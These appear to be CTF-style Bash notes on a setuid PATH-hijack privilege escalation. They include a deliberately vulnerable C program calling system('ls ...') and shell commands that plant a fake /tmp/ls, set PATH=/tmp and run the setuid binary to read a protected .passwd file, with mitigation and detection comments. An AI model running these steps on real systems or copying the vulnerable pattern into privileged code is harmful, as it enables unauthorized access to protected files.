Bash

General & Tricks

# base program
/*
 * Vulnerable example: a setuid program calling system(3) with a bare command
 * name ("ls").  system() hands the string to "sh -c", and that shell resolves
 * "ls" through the PATH it inherited from whoever started the program -- the
 * kernel does not sanitize PATH for setuid executables.  Whoever controls
 * PATH therefore controls which executable runs with the file owner's rights.
 *
 * Mitigation: do not call system() from a privileged program.  Use an
 * absolute path (/bin/ls), exec with an explicit, fixed environment (execve
 * with your own envp), and/or drop privileges before spawning anything.
 */
int main(void)
{
        /* "ls" is resolved via PATH at runtime; return value is ignored.
         * /path/to/.passwd is a placeholder for the file the program reads. */
        system("ls /path/to/.passwd");
        return 0;
}

# As soon as the program is executed with the 's' (setuid) flag, i.e. with the owner's rights, you can privesc by copying the program you want to impersonate
# PATH hijack: plant an executable under the name the privileged program
# resolves through PATH ("ls"), then put the writable directory holding it in
# front of everything else.  The "sh -c" spawned by system() in the target
# finds /tmp/ls before /bin/ls, so the copied cat runs with the owner's rights.
# Defender's view: a writable directory (here /tmp) in the PATH of a
# privileged process, or a file named like a coreutil under /tmp, is the
# signature of this technique; the fix belongs in the target (absolute path,
# fixed environment), not in the lookup.
cp /bin/cat /tmp/ls
# Bare assignment: reaches child processes only because PATH is already
# exported in any normal login shell.  It also hides every other external
# command from the current shell until PATH is restored.
PATH=/tmp

# Variant: instead of copying cat, write a one-line script whose interpreter
# line is "/bin/cat --".  Executing /tmp/ls makes the kernel run
# "/bin/cat -- /tmp/ls <args>", so "--" ends option parsing and any argument
# the target appends (even one beginning with "-") is treated as a file, not
# as a cat option -- that is what "escaping options" means here.
echo '#!/bin/cat --' > /tmp/ls
chmod 755 /tmp/ls
# Run the setuid target with a PATH that contains only the planted directory.
# NOTE(review): passing ".passwd" presumes binary_setuid forwards argv into
# its system() string; the base program above hard-codes the path, so this
# line shows the general shape -- confirm against the real target.
env PATH=/tmp ./binary_setuid .passwd
# base program
/*
 * Same vulnerable base program as above, repeated for the symlink variant.
 * system() runs "sh -c ls ...", and the shell resolves "ls" through the
 * caller-controlled PATH; the setuid bit does not reset PATH, so the caller
 * picks the binary that runs with the owner's rights.
 *
 * Mitigation: avoid system() in privileged code; use an absolute path and an
 * explicit environment (execve), or drop privileges first.
 */
int main(void)
{
        /* "ls" is PATH-resolved at runtime; return value is ignored.
         * /path/to/.passwd is a placeholder for the file being read. */
        system("ls /path/to/.passwd");
        return 0;
}

# Symlink variant of the same hijack: /tmp/ls points at /bin/cat, so the PATH
# lookup inside the privileged program's "sh -c" runs cat with the owner's
# rights.  Detection angle: symlinks or binaries under /tmp named after
# coreutils, and privileged processes whose PATH starts with a writable dir.
ln -s /bin/cat /tmp/ls
# Still runs the real ls: PATH has not been changed yet at this point.
ls -l /tmp/ls
# Reaches the child only because PATH is exported (it normally is).
PATH=/tmp
# echo is a builtin, so it keeps working after PATH no longer has /bin.
# Unquoted $PATH is harmless for "/tmp" but should be quoted in real scripts.
echo $PATH
# The target inherits PATH=/tmp and resolves "ls" to the planted symlink.
./binary1